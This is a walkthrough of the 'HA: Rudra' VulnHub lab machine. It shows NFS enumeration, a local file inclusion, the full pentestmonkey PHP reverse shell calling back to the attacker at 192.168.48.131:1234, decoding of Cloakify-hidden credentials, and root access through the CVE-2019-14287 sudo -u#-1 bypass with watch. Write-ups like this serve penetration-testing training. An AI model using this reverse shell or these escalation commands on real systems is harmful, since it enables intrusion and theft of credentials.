HA RUDRA (VULNHUB)

root@kali:~# nmap -A 192.168.48.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 17:48 GMT
Nmap scan report for 192.168.48.132
Host is up (0.00038s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA)
| 256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA)
|_ 256 30:da:01:de:ab:d8:19:1e:fc:58:44:22:3b:29:33:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Rudra
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35880/udp6 mountd
| 100005 1,2,3 44666/udp mountd
| 100005 1,2,3 48755/tcp6 mountd
| 100005 1,2,3 58197/tcp mountd
| 100021 1,3,4 38053/tcp6 nlockmgr
| 100021 1,3,4 41059/tcp nlockmgr
| 100021 1,3,4 45041/udp6 nlockmgr
| 100021 1,3,4 51030/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
MAC Address: 00:0C:29:78:5A:A2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.48.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

In the browser, http://192.168.48.132/ is only the "HA: Rudra" landing page nmap already reported, so the first lead is the NFS service (rpcbind on 111, nfs on 2049).

showmount lists the exports and the clients allowed to mount them; a client spec of * means any host on the network:

root@kali:~/Downloads# showmount -e 192.168.48.132
Export list for 192.168.48.132:
/home/shivay *
root@kali:~/Downloads# cd /tmp
root@kali:/tmp# mkdir ignite
root@kali:/tmp# mount -t nfs 192.168.48.132:/home/shivay /tmp/ignite
root@kali:/tmp# cd ignite
root@kali:/tmp/ignite# ls
mahadev.txt
root@kali:/tmp/ignite# cat mahadev.txt
Rudra is another name of Lord Shiva. As per the vedic scriptures there are total 11 rudras. Of them, prominent one is Shiva. The other 10 rudras are considered as his expansions. As per Mahabharata, Srimad Bhagavatam and other vedic texts Lord Shiva appeared from Lord Brahma's eyebrows. Srimad Bhagvatam tells us why Lord Shiva is known as "Rudra":

The text is flavour only. The useful fact is that a user's home directory is exported to the world, and /tmp/ignite is now a live view of /home/shivay on the target.

root@kali:/tmp/ignite# dirb http://192.168.48.132/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Fri Nov 15 17:55:15 2019
URL_BASE: http://192.168.48.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.48.132/ ----
==> DIRECTORY: http://192.168.48.132/assets/
==> DIRECTORY: http://192.168.48.132/img/
+ http://192.168.48.132/index.html (CODE:200|SIZE:4639)
+ http://192.168.48.132/robots.txt (CODE:200|SIZE:10)
+ http://192.168.48.132/server-status (CODE:403|SIZE:279)

---- Entering directory: http://192.168.48.132/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.48.132/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Nov 15 17:55:20 2019
DOWNLOADED: 4612 - FOUND: 3

robots.txt is ten bytes long and holds a single entry:

http://192.168.48.132/robots.txt

output: nandi.php

nandi.php takes a file parameter and includes whatever path it is given, which makes it a local file inclusion. A first test with /etc/passwd confirms it and lists the accounts on the box:

http://192.168.48.132/nandi.php?file=/etc/passwd

output :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
rudra:x:1000:1000:rudra,,,:/home/rudra:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakaal:x:1001:1001:,,,:/home/mahakaal:/bin/bash
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
shivay:x:1002:1002:,,,:/home/shivay:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

Three accounts have a real shell (rudra, mahakaal, shivay), and shivay's home is the directory exported over NFS.
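A small triage over the two artefacts gathered so far, added here as an example and not part of the original walkthrough: it parses the passwd file the LFI returned and the showmount output, lists the accounts that can actually log in, and flags any account whose home directory sits inside an NFS export, which is exactly the write-then-include chain used next. The input strings are copied from the page (passwd abbreviated to the relevant lines); the function names are my own.

```python
"""Post-LFI triage: login-capable accounts and homes reachable through NFS.
Added example for this page; inputs are copied from the page, names are mine."""

# Constructed input: the /etc/passwd returned by nandi.php?file=/etc/passwd,
# cut down to the lines that matter for the triage.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
rudra:x:1000:1000:rudra,,,:/home/rudra:/bin/bash
mahakaal:x:1001:1001:,,,:/home/mahakaal:/bin/bash
shivay:x:1002:1002:,,,:/home/shivay:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
"""

# Constructed input: the `showmount -e 192.168.48.132` output from the page.
SHOWMOUNT = """\
Export list for 192.168.48.132:
/home/shivay *
"""

# Shells that never give an interactive session.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


def parse_passwd(text):
    """One dict per well-formed passwd record; blank, comment and malformed lines are skipped."""
    users = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # not a passwd record (e.g. HTML wrapped around the LFI output)
        name, _, uid, gid, _gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "home": home, "shell": shell})
    return users


def login_capable(users):
    """Accounts with an interactive shell: the ones worth a password or SSH key."""
    return [u for u in users if u["shell"] not in NOLOGIN_SHELLS]


def parse_exports(text):
    """Map export path -> client spec from `showmount -e` output ('*' = anyone)."""
    exports = {}
    for line in text.splitlines()[1:]:  # first line is the 'Export list for' header
        parts = line.split(None, 1)
        if len(parts) == 2:
            exports[parts[0]] = parts[1].strip()
    return exports


def exported_homes(users, exports):
    """(user, export, clients) for every home directory that lies inside an export.
    A file written through such a mount appears at a path the LFI can include."""
    hits = []
    for u in users:
        for path, clients in exports.items():
            if u["home"] == path or u["home"].startswith(path.rstrip("/") + "/"):
                hits.append((u["name"], path, clients))
    return hits


if __name__ == "__main__":
    users = parse_passwd(PASSWD)
    print("login-capable:", [u["name"] for u in login_capable(users)])
    print("homes reachable over NFS:", exported_homes(users, parse_exports(SHOWMOUNT)))
```

The check is deliberately based on the home directory rather than on the export name: an export of /home would put every user's home in reach, and the same function reports all of them.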

An include() on an attacker-controlled path turns into code execution as soon as the attacker can place a file anywhere on disk, and the NFS mount gives us exactly that. Create the reverse shell inside the mount (the page's copy is the pentestmonkey php-reverse-shell; the header that the listing cut off is restored here, with the callback set to the Kali address that appears in the netstat output later):

root@kali:/tmp/ignite# gedit shell.php

<?php
// php-reverse-shell (pentestmonkey): connects back to $ip:$port and pipes
// an interactive /bin/sh over the socket.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.48.131';  // attacking machine (Kali); change to your own address
$port = 1234;            // port the nc listener waits on
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';  // banner commands, then the shell
$daemon = 0;
$debug = 0;

// Daemonise ourself if possible to avoid zombies later
if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0);  // parent exits, child carries on
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");
umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    global $daemon;
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Save it. Because /tmp/ignite is the mounted export, the file now exists on the target as /home/shivay/shell.php (the server accepted the write; whether the export is rw with no_root_squash or the directory is simply world-writable is not shown on the page). Start the listener before triggering it:

root@kali:/tmp/ignite# nc -lvnp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

Including the file through the LFI makes PHP execute it on the target:

http://192.168.48.132/nandi.php?file=/home/shivay/shell.php

and the listener receives the connection, with the banner commands (uname -a; w; id) running first:
Ncat: Connection from 192.168.48.132.
Ncat: Connection from 192.168.48.132:52344.
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:10:08 up 21 min, 0 users, load average: 0.01, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Upgrade the dumb shell to a pty first (mysql and sudo prompts need one), then look at what listens locally:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:41059 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:60561 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:58197 0.0.0.0:* LISTEN –
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN –
tcp 0 0 0.0.0.0:44447 0.0.0.0:* LISTEN –
tcp 0 104 192.168.48.132:52344 192.168.48.131:1234 ESTABLISHED 904/sh
tcp 0 0 192.168.48.132:2049 192.168.48.131:851 ESTABLISHED –
tcp6 0 0 :::2049 :::* LISTEN –
tcp6 0 0 :::38053 :::* LISTEN –
tcp6 0 0 :::111 :::* LISTEN –
tcp6 0 0 :::80 :::* LISTEN –
tcp6 0 0 :::48755 :::* LISTEN –
tcp6 0 0 :::22 :::* LISTEN –
tcp6 0 0 :::59927 :::* LISTEN –
tcp6 0 0 :::47067 :::* LISTEN –
tcp6 0 0 192.168.48.132:80 192.168.48.131:51902 ESTABLISHED –

MySQL is bound to 127.0.0.1:3306 only, which is why nmap never saw it; from the local shell it accepts root with no password at all:

www-data@ubuntu:/$ mysql -u root
mysql -u root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mahadev            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.01 sec)

mysql> use mahadev;
use mahadev;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_mahadev |
+-------------------+
| hint              |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from hint;
select * from hint;
+---------------------------+
| hint                      |
+---------------------------+
| check on media filesystem |
+---------------------------+
1 row in set (0.00 sec)

mysql> exit
exit
Bye
www-data@ubuntu:/$ cd /media
cd /media
www-data@ubuntu:/media$ ls -la
ls -la
total 24
drwxr-xr-x 4 root root 4096 Oct 21 09:08 .
drwxr-xr-x 22 root root 4096 Oct 21 07:43 ..
drwxr-xr-x 2 root root 4096 Oct 21 07:42 cdrom
-rw-r--r-- 1 root root 140 Oct 21 08:50 creds
lrwxrwxrwx 1 root root 7 Oct 21 07:42 floppy -> floppy0
drwxr-xr-x 2 root root 4096 Oct 21 07:42 floppy0
-rw-r–r– 1 root root 122 Oct 21 09:08 hints
www-data@ubuntu:/media$ cat hints
cat hints
https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/

without noise
www-data@ubuntu:/media$ cat creds
cat creds
😴
😬
πŸ˜₯
😭
🐼
😬
πŸ™ˆ
πŸ˜•
🐼
😬
🐡
😊
πŸ˜€
😻
πŸ˜₯
πŸ˜“
🐼
πŸ˜…
πŸ˜•
πŸ˜•
πŸ˜€
πŸ™Š
😾
πŸ˜•
😝
πŸ˜›
πŸ™Ž
πŸ™Ž

Twenty-eight lines, one emoji each (some of them mangled by the page's character encoding). The hints file names the tool: Cloakify base64-encodes its input and replaces every base64 symbol with the token at the same position of a cipher list, one token per line, and "without noise" means no decoy columns were added. Copy the 28 lines to the attacking machine (saved here as /root/pwd) and run the factory from a clone of:

https://github.com/TryCatchHCF/Cloakify

root@kali:/tmp/ignite/Cloakify# python cloakifyFactory.py
[Cloakify Factory banner: "Hide & Exfiltrate Any Filetype in Plain Sight", Written by TryCatchHCF, https://github.com/TryCatchHCF]

==== Cloakify Factory Main Menu ====

1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit

Selection: 2

==== Decloakify a Cloaked File ====

Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/pwd

Save decloaked data to filename (default: ‘decloaked.file’): /root/decodedpwd

Preview cloaked file? (y/n default=n): n
Was noise added to the cloaked file? (y/n default=n): n

Ciphers:

1 – belgianBeers
2 – rickrollYoutube
3 – dessertsSwedishChef
4 – ipAddressesTop100
5 – worldFootballTeams
6 – dessertsThai
7 – evadeAV
8 – starTrek
9 – dessertsArabic
10 – skiResorts
11 – hashesMD5
12 – pokemonGo
13 – topWebsites
14 – worldBeaches
15 – desserts
16 – geocache
17 – statusCodes
18 – amphibians
19 – geoCoordsWorldCapitals
20 – emoji
21 – dessertsChinese
22 – dessertsRussian
23 – dessertsHindi
24 – dessertsPersian

Enter cipher #: 20

Decloaking file using cipher: emoji

!!! Decloaked file /root/pwd., save to /root/decodedpwd

root@kali:/tmp/ignite/Cloakify# cat /root/decodedpwd

mahakaal:kalbhairav
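The decode works because Cloakify is a substitution, not encryption: the payload is base64-encoded and each base64 symbol is swapped for the cipher token at the same index. That is visible in the creds file itself: "mahakaal:kalbhairav" is 19 bytes, so its base64 (bWFoYWthYWw6a2FsYmhhaXJhdg==) is 28 symbols, the emoji on lines 2, 6 and 10 are identical because those positions are all W, and the last two lines match because they are the == padding. The following re-implementation is an added example for this page, not Cloakify's own code; the 65-token cipher list is a constructed stand-in for the tool's real lists (such as emoji), and the noise handling assumes the layout of Cloakify's noiseTools, which prepend extra columns in front of the token.

```python
"""Cloakify-style text steganography: base64, then one cipher token per symbol.
Added example for this page, not Cloakify's code.  CIPHER is a constructed
stand-in for a real list such as 'emoji'."""
import base64

# Cloakify indexes its cipher files by this alphabet: 64 base64 symbols plus '='.
B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

# CONSTRUCTED cipher: token i stands for B64_ALPHABET[i].  Any 65 distinct
# strings (emoji, beer names, IP addresses) work the same way.
CIPHER = ["tok%02d" % i for i in range(len(B64_ALPHABET))]


def cloakify(data: bytes, cipher, noise=None) -> str:
    """Base64-encode `data` and emit one cipher token per symbol, one per line.
    If `noise` (a list of strings) is given, a decoy column is prepended to
    every line, the way Cloakify's noiseTools disguise the token column."""
    if len(set(cipher)) != len(B64_ALPHABET):
        raise ValueError("cipher needs %d distinct tokens" % len(B64_ALPHABET))
    symbols = base64.b64encode(data).decode("ascii")
    lines = []
    for i, sym in enumerate(symbols):
        token = cipher[B64_ALPHABET.index(sym)]
        if noise is not None:
            token = "%s %s" % (noise[i % len(noise)], token)
        lines.append(token)
    return "\n".join(lines) + "\n"


def decloakify(text: str, cipher, strip_noise=False) -> bytes:
    """Inverse of cloakify: map every line back to its base64 symbol and decode.
    With strip_noise=True only the last whitespace-separated field is the token
    (the prepended noise columns are dropped)."""
    lookup = {tok: B64_ALPHABET[i] for i, tok in enumerate(cipher)}
    symbols = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue  # tolerate blank lines
        token = line.split()[-1] if strip_noise else line.strip()
        if token not in lookup:
            raise ValueError("line %d is not a token of this cipher: %r" % (lineno, line))
        symbols.append(lookup[token])
    return base64.b64decode("".join(symbols), validate=True)


def cloaked_length(data: bytes) -> int:
    """Number of lines a cloaked file will have: 4 per 3 input bytes, rounded up."""
    return 4 * ((len(data) + 2) // 3)


if __name__ == "__main__":
    creds = b"mahakaal:kalbhairav"            # the page's decoded credential
    print(cloaked_length(creds), "lines")      # 28, like the creds file
    cloaked = cloakify(creds, CIPHER)
    print(decloakify(cloaked, CIPHER))
```

Because the only secret is which of the shipped lists was used, anyone holding the tool can try all 24 ciphers in turn; the line count alone already gives the plaintext length to within two bytes, and repeated tokens expose repeated base64 symbols.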

The decoded file is a username:password pair, and it works over SSH:

root@kali:/tmp/ignite/Cloakify# ssh mahakaal@192.168.48.132
The authenticity of host '192.168.48.132 (192.168.48.132)' can't be established.
ECDSA key fingerprint is SHA256:uJVa69XQYauqQVQn0+cN2ja+kVf0BhhWII8EIREHGT4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.48.132' (ECDSA) to the list of known hosts.
mahakaal@192.168.48.132's password: kalbhairav
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Mon Oct 21 09:59:11 2019 from 192.168.1.107
mahakaal@ubuntu:~$ sudo -l
[sudo] password for mahakaal: kalbhairav
Matching Defaults entries for mahakaal on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakaal may run the following commands on ubuntu:
(ALL, !root) /usr/bin/watch
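The shape of that rule is the whole story: (ALL, !root) grants every target user except root. On sudo before 1.8.28 the exclusion is checked against the name or number as typed, so -u#-1 passes (it is not "root"), but the uid -1 handed to setresuid() leaves the process at uid 0 (CVE-2019-14287). A parser for sudo -l output that pulls such rules out and checks them against a version string, added here as an example of the check and not part of the walkthrough: the listing is the one above plus one constructed extra rule so the filter has something to reject, and the version banners are constructed samples (the page never runs sudo --version).

```python
"""Audit a `sudo -l` listing for (ALL, !root) rules and decide whether the
installed sudo predates the 1.8.28 fix for CVE-2019-14287.
Added example for this page; the listing is copied from it plus one
constructed rule (apt-get), the version banners are constructed."""
import re

SUDO_L = r"""
Matching Defaults entries for mahakaal on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakaal may run the following commands on ubuntu:
    (ALL, !root) /usr/bin/watch
    (root) NOPASSWD: /usr/bin/apt-get
"""

# "(runas_users[:runas_groups]) [TAG: ...] command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return the command rules that follow the 'User X may run' header."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and " may run " in line:
            in_cmds = True
            continue
        if not in_cmds or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # continuation line or something unexpected
        users = m.group("runas").split(":")[0]  # drop the runas-group part if present
        rules.append({
            "runas": [u.strip() for u in users.split(",")],
            "tags": m.group("tags").replace(":", " ").split(),
            "cmd": m.group("cmd").strip(),
        })
    return rules


def root_excluded_only(rules):
    """Rules that allow every target user except root: the shape -u#-1 abuses."""
    return [r for r in rules
            if "ALL" in r["runas"] and any(u.lower() == "!root" for u in r["runas"])]


def parse_version(banner):
    """'Sudo version 1.8.21p2' -> (1, 8, 21); the 'p' patch level is ignored."""
    return tuple(int(x) for x in re.findall(r"\d+", banner)[:3])


def bypassable(rules, sudo_banner):
    """True when an (ALL, !root) rule exists and sudo predates 1.8.28.
    Distributions backport the fix without changing the upstream number, so
    True means 'try sudo -u#-1 id', not proof."""
    return bool(root_excluded_only(rules)) and parse_version(sudo_banner) < (1, 8, 28)


if __name__ == "__main__":
    rules = parse_sudo_l(SUDO_L)
    for r in root_excluded_only(rules):
        print("root-excluded rule:", r["cmd"])
    print("bypassable on 1.8.21p2:", bypassable(rules, "Sudo version 1.8.21p2"))
```

The version test is only a hint: Ubuntu 18.04 fixed this in its 1.8.21p2 package without bumping the version, so the real test is whether sudo -u#-1 id reports uid=0. Either way, once the rule matches, watch is the rest of the problem: its -x option runs the given command directly, so whatever it spawns inherits the uid.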
Sudo here still accepts -u#-1, so the (ALL, !root) rule is satisfied while the command runs as uid 0. watch -x executes the command directly rather than through sh -c; inside it, reset clears the screen and exec sh 1>&0 2>&0 points the shell's output at the terminal (fd 0) that watch would otherwise keep repainting, which gives a usable root shell:

mahakaal@ubuntu:~$ sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0'
#
# cd /root
# cat final.txt

[final.txt: ASCII-art trident flag]

!! Congrats you have finished this task !!
Contact us here:
Hacking Articles: https://twitter.com/rajchandel/
Aarti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
Enjoy HACKING

@SAKSHAM DIXIT